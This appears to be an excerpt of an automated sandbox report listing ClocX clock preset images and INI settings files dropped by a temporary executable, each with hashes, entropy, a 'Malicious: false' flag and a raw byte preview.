Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 250 x 250, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	48014
Entropy (8bit):	7.986851682633987
Encrypted:	false
SSDEEP:	768:iNAFMfapVRMLrN41wNbVDgrnTjBebwTXR2B6tYhfU3XlGfKWFDJrtw+dceO06ANw:iNAF5VUEEbirTdmwTgBLhfUFGl5dG0na
MD5:	ABE2E3676135DC72C21F6AC4D55D5C8C
SHA1:	43073CC174592A80D8E2D7AD23BFA2164B92774F
SHA-256:	EF28D4EF8CAB0CEEFD7B60FE2C2ECDE52DECFEA74B041C452046DDDD4852CBA8
SHA-512:	6F7953B3655F08FFFD73AA779BAC4E49ECDDAB36323F4ED8C2CE32EA38365A074FF4F4F02FB240BAE62690D002C944ED8E17E2189425E387CECE970392A098B2
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............Z=....pHYs...t...t..f.x....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx...i...v....y.Z{...._.J.e..cc.....&.).`...pR.SE......Ec.C....+4......P\|IH..eDY.u.k]].{....z..#...Z..e.....S>.......^{.9....#...<.........\.K._..sy..~y......<..R...\.K._..sy..~y......<..R...\...\..s)..sy.../..<.B.<...\...\..s)..sy.../..<.B.<..R...\.K._..sy..~y......<..R...\.K._..sy..~y......<.B.<...\...\..s)..sy.../..<.B.<...\...\..s)..sy.../..<......+..o..;...\|.mD:O....y.;;j........+.....).....5./P.S'.r{{K....'O.q..}J..5.v@.N.pX.&\.[......3...;.J.'D...a..wy..........-\....5.....{w./~.K.m.....;..y..<...y.?.u....n..2Os..........=.F..t..~l}..wv.?c..f..>.w_}.o...gO....ly.../?x..7.....\|......*"....'.JUz7..C......?@T..........g..w........e...Z...5w..x.....7..T..`..n`...`q.i3.7O..)h.(u....,Z........\|...._.......;f..!"/.._Y....k....f...f..'?..oOZ.n.:...Z..-.D.fj.B.g.yBDq3..~.....p`..n.k....}9...zo?....w./...w

C:\Program Files (x86)\ClocX\Presets\negro2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	4.79578084741415
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrUBRSTOLX01rfPkp+dGm8JiX33NPeibQ0Wd9iBxLuQI:BzqFlQGiEdGmxtPBQJTiBxLvI
MD5:	D4C8BC1C07C0077783E15664BADF33E3
SHA1:	EF27B3AE33D84581098C96384784282E090AFAC1
SHA-256:	051468A847913306CF9FB5DCBF17BDDAB5AC36689DCBA6DA0374DBBB5383B6C0
SHA-512:	5F7C44CE2FBB1E4FA332436CAFDE4085A91CC55DFDC404143A586B3777AA168783F6D82396C57C443102CE9606E044845E5680209FF8234D78CCEC9E5FF4632A
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0xfffFFF ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=59 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2).. ;

C:\Program Files (x86)\ClocX\Presets\negro2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10079
Entropy (8bit):	7.847117851925215
Encrypted:	false
SSDEEP:	192:prca/zZV69AIpL/JUxeRyqyrujNobJMFS3ZkjOsFsBgBEEziuS0roY:pgUHUplZar3ASJkbFikMUoY
MD5:	F0F3D8BCA45643B990FB0E2924BD4AA9
SHA1:	6A60789BB15D0CEE548691A379C95F9BFBEE7B21
SHA-256:	FFCAF7B027D1C6E00F06437F1E4864417BDC4F2428125140118A73C6A6449B28
SHA-512:	0881677F642CA9C0135859B1B16B614D952E36C62A100C421E3ADF4DF6CA0D87802C3B58F5FE8F6256F5D9782041290B0F7A50C7BB1219382B0F0BFB66270AF7
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............<.q.....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..&.IDATx.b...?.(.......4...... .F..(......5.h...h4a......b.....II.$ %.../_.~..........br@,..@...hZA=..@..._..#&&.........?......><..\|.H.S..b.i.B`"J.........d.d[...hl.3FF...vZ@@.+........p...a.....\|.......y....(d...7....`B..((..X:>\|.........4,....x8._.o...FZ8PHt.;.50......,.>.\|.r.P........ .DO..U@FD..H..<.g...&...:".._Dr....'....c).....{.?.....h.!.....s.g\.....ZV.....@.7.Bk.DC.ZQJ...)%...s.+m2.f!.3.x..-v.4........7.O.>...N..jkk3...1(((..1...1pqqa...cb..."........r#.}...c.....<x.p..-..W...u....*..Am..C)^..h.&,`....,..?.f........3......T...(..>`m,. '...n<.c8.....,`..KVpi.Jd..]bx..!>-.....3./`)8$J1...r.....m'.`.S...$++.`dd...@%...O.]..B..\.....x.....3....~....@..s...?~..-.l....b..{....!..@...>\|....G!z..T.YXX0...2hjj2....=.Vb.+.........._...^..U..>}..nw.[B....~d.~.:.....N.8.K.3...~.?...a.......X}........ru...`ee.`ll.....H.% l.IK.........~....0.1}.

C:\Program Files (x86)\ClocX\Presets\roman2\roman2hour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 70 x 17, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2769
Entropy (8bit):	7.792620734470326
Encrypted:	false
SSDEEP:	48:WkrslCkP6Xi1YjEY8Dy1H05LdkKCMmXlpnXqz5yymUwKROk6D58GrQFfddu0:VrkCG1OEY8Dy1SiKxmVpXM5rJk/5vrQ1
MD5:	C0086565894CB169BCC489833502B612
SHA1:	B188D83FFD2BB7418E96678AEBF3F0FFD68C581D
SHA-256:	1DE95BC6957AFB9B2906C37235C62A9B6CCF09B1C7A3580DBF18CC2877FA08E3
SHA-512:	91ADF17A2AA41CB4CD78E1C1C9754DB9058B66412BB0389608ED20FA906A26800C0ABEAFF3EFF1E0EE3137D3B2D486FE72C49D354CBE83107B8959C1C18AA8E8
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...F............]....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o.......\IDATx.b...?Cd.o%..a++kVd>@......_.x......N.&..F6.ffF.{'k.vf.............. .dca.?.....@`.b..?}.H..?V......X........UIQ..@..e.@...K.....Rl.n.?<.?...@....?..vuHE... ..a.N].8s...v,?Y..%%g.[...k!".s......k.lt5...6-7/...+`8??...9..b.....b.../..Vt8V.s...&M.a1.5....@.....l...r....._........._.l......e...'..7;.....L.@`dee...K.....~A!...b....b...?............K. ...J.. .............''0..f....[.x.fb.q......P...9...._.~a.....}..^R...@.].'...}..i,.JJ.a.^..?........../........c`gg........o......XX.ev.~.....o.`z..u......?0...\|................!!}.................._.0.......s...4."...#.;~....73.3..C..9..?S930...q.dcc>.........X.y.~.....wrwKs./0.2=}....._..s...7xt..&....._.>.k.<.... x4....`.e.F......o...1....]....,._.1...g`b....a.tR.. .......af.....i...}E.!........a..u.... H.......7....3.............1...B\X.-...M..._.\.......x...Vn........CxB.......3g......`>..b{z8...y..

C:\Program Files (x86)\ClocX\Presets\roman2\roman2minute.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 100 x 18, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	3321
Entropy (8bit):	7.851054365624773
Encrypted:	false
SSDEEP:	48:7Sn/kwui7s9kX+QG5XH9Ek8bRs7aQqGPUEButE468UBLeYLpTHfvijH7j1:7S8s7s9klG5NKCaLqbAtEP8sLTLprvO
MD5:	FEAAEA47FFCDD97BBAB8CB95594EF1C8
SHA1:	0E82A0462942C551F465CEE6ADCC5A50BAD64337
SHA-256:	0B0692E09562B1C694938126D1E9EA74FA90A57C0D9471C2E0A23CFE7CE5A48E
SHA-512:	9EC4183039ACF07801D9C77BF245F25C42A4A21736906C7E54DBF67A218FD76524D1A36A526C05964871B0C6255B4F9595B69903B619045AA6E32F23A4398150
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...d..........K.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b...?..y.Z@4.. .X\|...o^.J....?+3..#._..?.3.sp1..........?..~.``e.f.J1...#H'.. .H...@,A.a.?.~....t....,..._..``dbf`.fg`........v6^./_.3......@..........KV//..nn..]...2...g.sg,..VRr.[.{...aU.U.B. .X.={...?..../.y1....?.vw...U...Q....0........U.<..@`../^..o.>.R....@..NN..........t.o@...3.Dn......+......%...pH.6..@.....$h.,.@i.lZ9..{..Q.....z...&WJ.c....z... H....n.W.J..:4.Y..T.Fp>..N...w.f.R.v...'....\..........j....\u..U&.;;;. 1>.. .....g.".@..-.{.OWG.ff...L,..?..ep.q.^.P.E.Ki...0P.,..q....... 'o.....MH2...%.^...U...,x......+...yz..h\|...%...tVq...\|.XSB....n....pF.....>..A..@..`q..&\a...Lel..v..$...?.%aQ.^[!4..2..E.D..0......\*.L....'...!...<........Z.(%...u.T.j.^...@,......../....u............y...@...Y.!..o.\|............}...;.....j.....>..r............/]<.v...........={vq.........'..Y...........M@....gO^...c-k.....'.uk.i.].....oxX.........DZ$.Z...

C:\Program Files (x86)\ClocX\Presets\roman\romanhour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 80 x 10, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2837
Entropy (8bit):	7.765437921106241
Encrypted:	false
SSDEEP:	48:rmzGRbMWjvJsO1a/S+2OVag8MQBAYQ7f0wcGrdQiAn7y0Jyd2suRYhZB:r+GtMWm7/aOqBAYQRrSiA7/Jy8NRM
MD5:	D51150B7FA07035717F4007284A73C6E
SHA1:	62825D81670244A1652FEF4573F6B21FD3E61CAF
SHA-256:	96E532EB349DEB34228EBE3321E0727C3638A0A4F80E7700760C08A436B13DDB
SHA-512:	4C6485A35DC02BFAE6F1E2B18B6B49BB35FD1ABEE7FFE070AD0AB50F834AC44BFBB5062EA47DB701B0ACFEE8BB900E23F014966BFF8AB59D9D58BCCE6835B9F6
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...P.........T......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b...?.......?....g..M.2g..............)..............\|.....@;:.##%.@JB............l...f..?.....1~...?'7/..........._.,....V...'Fq6....e...f...........=ZZ.nLl.....n.+.#.`..?.~.a.........../.?&.?....s.?....x..e...@...3.........n^..%.SB..........?.....dd.........?##./...^../!.....w.77..B...,Y"...7......d..........@p..Y.m].=w....7#...+.+#;'..?.X...........E>.............l.....a....+$$...... .....`...p........t.&.#=M.K..T...2.....g...7....TS?1a........1.0.a..........e ....SI....3....H....4.......?.l.\.3.Ob..*f........@.}...........x....^.Z.........T..........O.>0.......9kja.mnlR...+...'...?3HII1..e....#@.a8..Lx.%s&-...../~^.o\l...............l.?....ch..... ...........p.y...._~.........9.V.Hfdf.../.`.0...........?...A......a...Mf.V......w..K.....2...V..._.....3..d.&....X...2.d........P../.._fF`v.......O.1.h[3.S2.33..O.TW...L. ....^....W\v...... ..,...........

C:\Program Files (x86)\ClocX\Presets\roman\romanminute.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 100 x 9, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	3158
Entropy (8bit):	7.824208485673109
Encrypted:	false
SSDEEP:	48:3AzX0UHGEFpLWR5XgeqLFOYhxzRnwMdsrnYPcds1oIFFTth5bNMuv5qWBR3hxk:wrdGEFlKJg7LFXx9nwMdeldsa6Ff57E
MD5:	A86418DBE12535F31E5E73B3DC7BAF2A
SHA1:	F080EA7232635292A8BFC14F7139C2DF009CD70C
SHA-256:	711B797C47B4D076E3FEA8FF4049DA416FDAF36550DF6B913A2399AF6AC5C8AA
SHA-512:	C3464D5A3EAEBA5DC85EF43039304EF7C4FC83B2472840ED0E3F102F7C92FC59E9BD4A3AC95970D490CC2E57480FA619BD580BE850E91F7B34890969B46F0B5E
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...d............F....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b...?......2........?...&&&.k.....`..v............. .X....~}.........?..............;...o>2...2.-........b.....of6f&.?..........q.].]]]....kv..)aIi.m..2......d.....F6.....ab..i.......f.......O...y.l.......ba.d.......:%..^fbdg`dbb............... ...h.....b.....Yx....~2.221...1......O........s...........d..~...wv....2..............4..L..?.w..a...(F.e@....d.db.#...,x..6A>. . ...... .X....,.......'..#...3'.....g`......0.a....-...O..?~0...1..........o....ObPTT.,"".... .X.62....9.l.l........&...@................%.(.........Z{z...._...d.4i..CG.\}}..x........@..<...R...8.5.......~...._....}........3.jY1.\|...'.A.`......_.C3...?.....1.(x.)............8\|......8.......~2xyy.....}x.......!....._....1.....r..&+).e..o....@x...`........ .X.....^...Q.........x....7/...........<.c=N`.f.+))..j...._k..z.>.......K.,epqua.f0.'9...:.._.~1...3\.z.a.......p..u.777nVn.u.~.d..

C:\Program Files (x86)\ClocX\Presets\romanblack\romanblackhour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 55 x 8, 8-bit gray+alpha, interlaced
Category:	dropped
Size (bytes):	853
Entropy (8bit):	7.357114506944816
Encrypted:	false
SSDEEP:	24:VqpER+AftkhOqlEWJYK+HGhF4oXzpCkZix64h:ApEUJYe5JY4hF40FZZG
MD5:	042882177AAB65A2B945B6BCD293C7DA
SHA1:	5C7588DCE0DC34CC5DC4D4BEF84EC738DFEE6860
SHA-256:	35A3E61E917A23F068D2E4B3C2E7503B1C2BCA5D610F4A106BF686BAE441670C
SHA-512:	4EE1E7AEF13492FBDBAFCB6EA82DB94590AF16C60CA03B7DDFC7956DB3D2C92448F0C1A44FE9D653F59BE650FA7FD7C0B24FE7F0FAD7C692F1B26627D11007C9
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...7............#....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b\|. .p.a3...Z....!.Z.C?.9....@..@.....2...6...o.0}d....$..@..1M.<...:.N0<c.g...........$A....1.......5.$...!.."....7.k5.....&..............3.c0`........pT.D.n....`......+..k..Oh.fx...`..p..;.F..b8..s=..$C+.:C..^...\@.Z...&s.8.M.o.2..sQ......gF....~n`...../._v..'.^.+.0..]......... ..z..R....}b..........>.\|..%....i.5..."....7..l[~Ob.d.b.b.f8b.._..#..n.b.....J..Pl.. .....!.f...}..?C;0^..B.z.V3.g......a&.K....o.~...!.....s...;.........}`.T..... F.w.....f....../......a......O.?..x.<...7...W..3.l~...?o...3..........&.........~k\|......<....@.....2.....20dt.._.g.?..b.........../.?../...<.Sy.._.g...,....f.c`f.a.b..&.] K.......lc.. .. ?.E..y..L7...M..$0..........9.......o.).8..'0..C....../`...T........@...(.&1.......IEND.B`.

C:\Program Files (x86)\ClocX\Presets\romanblack\romanblackmin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 55 x 7, 8-bit gray+alpha, interlaced
Category:	dropped
Size (bytes):	889
Entropy (8bit):	7.327700722895101
Encrypted:	false
SSDEEP:	24:rwlFZSCKBRDl7IBTwBrFKc+yFZZQrrDy8Bnz:rwYCcp7pr0cDFZmrr+8dz
MD5:	5B9B2F8241E1842B9921A1ACC940E78F
SHA1:	C8A28F4DEC48C4B63FE5E59AA7D9AF11FA709D85
SHA-256:	278C33465B3DA6829078264B5FB59293D261A97756B3781A2DA45AE93BC5A5B0
SHA-512:	FEE9D82BE6E74D1031BA6978E4279F7FE68510A263C2E419670759F47C7B8591385EB9EB77441BFE0D13B7A89F5C00BF6DF586B11ED1E46371986094E6D1FFCF
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...7.........q.-.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.bx.....a..d........!..v.4..@.\...........j..b!...........&......H........4C/.e........0,V<.`.0....J...bd...O..C.G..v..W-(.e....G.......9.....ur.....(.!.............1......<v.=.@.+.6.:.:.............;...W....60...K3.2...........2k8.....J.X...4.bb........q+..g..'.33.1(1..a....>....7.{...u{.1.....P.....<. .@..x.`d.}.^...7.$~.......o..~......JW..........c..........7...........t..................."...i....M..................e.}...U....:@......t.E..u..M_Shg...a...PF..t..>...b.+.......p0.....Q..8B@...!'P....@Y...<P.../.....?..zk~sp.N.\\r.?........$..B..Z..N..~.)...........[&........L@..........g.IQ....&....y....0H..}..........'.o..<.x~..ae.w. ...X..z..1*un]1.3................_...@........7`R...........X.\|....6{.gl.?.I.7.G.@...T%...>`.13.........e.9bCNe....IEND.B`.

C:\Program Files (x86)\ClocX\Presets\romanold\romanoldhour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 100 x 13, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2908
Entropy (8bit):	7.740448337420142
Encrypted:	false
SSDEEP:	48:rmLJNMjy7tneNT+ND/whTKkxtYhremTYJCnJwcosFFnmOqdhJe5HLHxZznVnShi6:i3MjmeNTejuTKkxt+reqJwcFFhmTJYLS
MD5:	D57F357BD6EC6CB8E6B4113934C93219
SHA1:	D1C3760AD06626D717096D565DAA5DD279404AAA
SHA-256:	D8DDD4E4F5FCEACB7487CDC71DDC3E611987B1BACCF7110797E2F33726023DFA
SHA-512:	B98597FA630695033D409232BF2CA38BF49854F1A322D07CF1C4EFAFF8B1C5557F25EC8854F7241970AB1D50A1877B61566128A4D31619CE9C45683A084CE4F9
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...d.........(..P....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b........./.2.......,Y....k...3l......(. ..b.............-Y:a..F._ZV...3g."##14.....I........./. ........_.}c8p..._.P4...#.?..0...M..........@.(+...`bee..........yKRF....!....e.{...Y.vM...2.MM\..<.,#'._^Q..P..ys...3TUU...b.;..........L......}\|..1..O...\..0y.....'1....'O...2e..o.....'.0.........,.. .'O.0...\|<\|..........+.2\|....S .v....f...'...^.r%.'.,.. F...Y...@a.w.^...r...X. .WLL......#h....X.......>...72hkk3..........p...bafff.....@......'O..g..NN./_.\.R...?....P..HII1.....o..[.....pZ.........y.....V.j.E (..L.......0.....0..S.G`.............h."..?.....b..L.J.....G..%.$..-).E...@.......L .._01.!..}e..v.......S*(..{........0?0..... ..#.8.a..>..........30?..F......... 60...y..f...P..c... 1.Z..P...,.aj@...........(e..................k...._........Sz...y...,.Y..i.i.K.K.......+...?..F .9.....(W.........]9u..0..A...L...S...s.......?P........o.....w.

C:\Program Files (x86)\ClocX\Presets\romanold\romanoldmin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 100 x 14, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	3709
Entropy (8bit):	7.8282860017277915
Encrypted:	false
SSDEEP:	48:897lfu06j8qtm8LF+2XKtC69+K06bqFoNUrtzi4pTGM+QjA3yn7o2/cre49YKq7B:6G0NmpXKcmqFkEte4pTGz3y7oNrhWB
MD5:	BEA6A1B4CC75E0A5D69C3E4EE40387C5
SHA1:	0A74C9554D2A88075D5F79C9CB308CC96FC22173
SHA-256:	AB47A5ADF204BC4CD1C14A7050FC6B1DC0DFA8C791EBCABC8111FDB003C45C17
SHA-512:	7A056097B6474538223A2D622F8FAE7095F2F1CEEAD789AF7683C47D9A72EA750A5E1C55FD107CD63DF50C30B832348E6DFF1896C16B03462152993F946447AD
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...d.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx..5........hji.LLL.........222.FFF.............SRS.....eee...5....~~~.........................111....m===....J..........1....}}}.....676.NON.#&&.....{\|{.......................QZF.?#.#.......0......~.../_...~..6._.....t.?...e.......i~~~................'............&&&lFFF.@@@............#\|\|\|.CEE+..........kjk.+**.........ooo..p@.F....E...w2..P.<.A.......j......R$oN].!..o.~.j...i:..+3.5..9`q.QJ..J)..x..Z.R.......1F>..p.....#.w...6.Yr......N...&2.u............ex..9.....\..V3y.4...........M...>\|.[.w.^.8..............:.y.u..../_.Pabb..{...nnk....22=...c`fff..L..`.....k../...^addd......{{{.rss....QZZ.?.0.A..r.0\|................t../.I......9.>}.t..I?.....X[[/........(88...........0~...e.M:^>.W..../^......O..G....#... W...........q.J. ...a.-`q...8.<(.A..r<@.1..ttt........6....jO.+v.....k..K..n...L.`.......E..R.....&.066f....'.........P..G..455...ex.....l.....e.E..^

C:\Program Files (x86)\ClocX\Presets\weemsplath.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1540
Entropy (8bit):	4.894560877458028
Encrypted:	false
SSDEEP:	24:BEZrGXE5lrABRhB0aKEszm1ETOs010Bi1ckpUdGIo8OiruPgibQ0Wd9iBxLuQI:BkqylUhB0fwL5n6dGJSuPXQJTiBxLvI
MD5:	1BA352511DC3D718D12F1FC7F9CB4290
SHA1:	52BAE52E80AC073BEA2F0431B956775B8A01D95E
SHA-256:	A613E004BA3A8616EAB72F42EF36B7425B40365A61AF112CE1CF0D79E871075B
SHA-512:	31CEBA1CAAC3845C43482450E61D71CD27F399A563971637283D260C9EDDE3E6C8829663E1F15975FFCF476F5AFEA8A37E7F1F71D551DD7EDA4F661718323B2C
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xAC6C1C ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x000000.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font..AMPMCenterX=92..AMPMCenterY=112......DisableDate=0..DateColor=0x000000..DateFont=Arial..DateFontSize=10..DateCenterX=90..DateCenterY=76......HourColor=0x0E1B2B ;color of hour hand..HourLength=29 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x0E1B2B ;color of minute hand..MinuteLength=40 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x3540BC ;color of second hand..SecondLength=45 ;length of second hand..SecondLap=0 ;overlap o

C:\Program Files (x86)\ClocX\Presets\weemsplath.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 228 x 228, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	66278
Entropy (8bit):	7.99259953440328
Encrypted:	true
SSDEEP:	1536:h6id/CGLVRKm+KOx487IQdf8WCLAl/QMJlW3cyb+C4q:hDxCG2ps0u9ArWkG
MD5:	E4309650933F9B7F4F7BBCD07161047C
SHA1:	0C4CBE0F0D28B3BA2C2AED2C555B5B284B86BFA4
SHA-256:	B379E31A40387B9B80C7D7196B15E77921ECF612FF3B3DE114DA67E7F6D99612
SHA-512:	E47DBDEC05705FC4E789E8678F8C11985049DFBE8C4F99E38EDB47BBE3B11AF6A853D139AC687DBEFA348AA97CCD1F56BF60D65749C44A55BEC98379E90E6A25
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............W......tIME.....'..(.....pHYs..........iTS....gAMA......a....uIDATx..w.d.}.x_.\.g..DLN....A&.. H0. ...(..+.+..u.-[.cW..sV.M:..+R.%Q..@. . .09..........~.j0.I.k..D.8......~....,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...X..cy,..<...x.O`y...G...%.G<..........!...-.[.....M?.....-..\|.....g..O}.o.@.].W..b....i..k.@.3......"....4.c,X..'..g..>;.\|.........?yj............2@....n. ............W.V.3.....m...}..,...0....i8..S....`d.F....X1(c0Z\|.a.>{Q...[..V.o..f"Uu.......8q.._>w..A...t..o.X..n\|.....w......W..5b..j..GB.nD^.\|.H..A..m..D...[-..E.0....i......b..r..}4...?.y.1 .0....Z.j.....iWa..+......p...'..._h...87v..G....z....G4...w;......GF..G.fcM..h..G..GM?......5..e..F@...0........~..4....$...w#..cP.$O..m.....~.I+.o......N....6."".F.LDF...q....V..z.p.r.a..S.....^....s.....f............28...2 .n..o>.a7a:...~..i.m.}...7.j.....DCVd..I..h..-.>l.RlD!5..l2..)..(....J...S.

C:\Program Files (x86)\ClocX\Presets\wonderglobe2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1471
Entropy (8bit):	4.866891600699003
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9Bx/aKy4dTOK01rfhkpGdGm8bCi1833NPeibQ0Wd9iBxLuQI:BzqFlpf1EY4dGmQD8tPBQJTiBxLvI
MD5:	DD1979CDDBE6614EA4FCE3617D2D8FCE
SHA1:	D5235ACE6190A103E02E52E1055CCDE04AF9C39B
SHA-256:	E6C0F7FC7F440FDCF18D90A84FC6EA75B487867E60C27DA3BD0A89C44ADD041C
SHA-512:	F64E7D03D0A41A79CEEF2CBDCA99D748A5F793FD8B8150AEF924B52AEA70731795DCF47C771ABB88C088F99DD99316AD05E962CBB917376428518F11A71A83A4
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0xFFFFFF..DateFont=Arial..DateFontSize=12....HourColor=0x33CCCC ;color of hour hand..HourLength=27 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x33CCCC ;color of minute hand..MinuteLength=42 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=44 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;Cente

C:\Program Files (x86)\ClocX\Presets\woodone\woodhour.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 40 x 14, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2290
Entropy (8bit):	7.700327487136672
Encrypted:	false
SSDEEP:	48:LLDh2CM+hIEWlV2mEGE9cx7g+SNpWmefyAZZJDrS:LB2oe5lVEYx7hSNCf7Zfe
MD5:	2B3AB55EE12A47F5A20F8CFA2D46724B
SHA1:	1FB28F49EC9D8F2B7E90EEF82CFA48C5B7BD8687
SHA-256:	40A519F829558E1BD12C88F891125420079D40FF3C10B5940724F8D27D69D4B3
SHA-512:	777B53C0912C99A4EFE0B7D91BBB8D24CE4D74BAEC12DB92905976E4635BF23FC69126309D2BDA7579328170B963B0B8A6D66AE5F84C68BB8823F4AC9D79C878
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...(..........n.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o.......}IDATx.b8t......>........s.+...b.....0a..{...imm9..... ..:...........^!Q...[.1....I...u.....ny9I....4......7.........9;../.?........_.s..SSQ...3...)............``^.........vvu......................7.......?g...?.%e...f...'..HHJ3........g......Vx........Sg/2.y.~.}..\!@..ps.2X...).)....t........../?.Y....U.VVV\|.. .I9i.K7o0dee3...2...........hlh..../.._.1...0l.2<z..!........._...=e8{....L...e...N.\.bm.K}.'Oc........ ..W.....Q.......P...POK....,KNV.&&#...........,++,....!....232H...........f...t..!.............a...99.L...lll...+....L..6........N..1.1......h....=...[VVV.w.>\|.......Q............................................pqo]........................??A.................^..=w........edaae...?.##.....D223_..G\|...8v..=......@L..<K.=w..{..........iww.{..>.z...?//.W.t!*%).63;.....?w...j@K1....Q...................r...rNLH....{................\|}~........(...........i...

C:\Program Files (x86)\ClocX\Presets\woodone\woodmin.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 60 x 9, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	2317
Entropy (8bit):	7.655538415930818
Encrypted:	false
SSDEEP:	48:3Od6w3EFNTi5xexqAPIzGS/S1eRl65PlgmpXnoBjuuSTq:3OdrUr+DqcieqempXnOvSTq
MD5:	71E6CF4FCE7A3C0088267F1A71ED8630
SHA1:	94B3755BF1077F8C52FFA7450DF6094F1C72E939
SHA-256:	EB308EFA319EA51E367092AAE0BD118081C0340B6ACAD03C1D55E431E33469D9
SHA-512:	C0D7A288D8425B3D4B22E9F48FD47F22095A631C41F6F67E0F364FDD41AC3029325B9133987C8CFD59B7816FAE02D4ADD0A6E16E923B422BAF175A062D025912
Malicious:	false
Reputation:	unknown
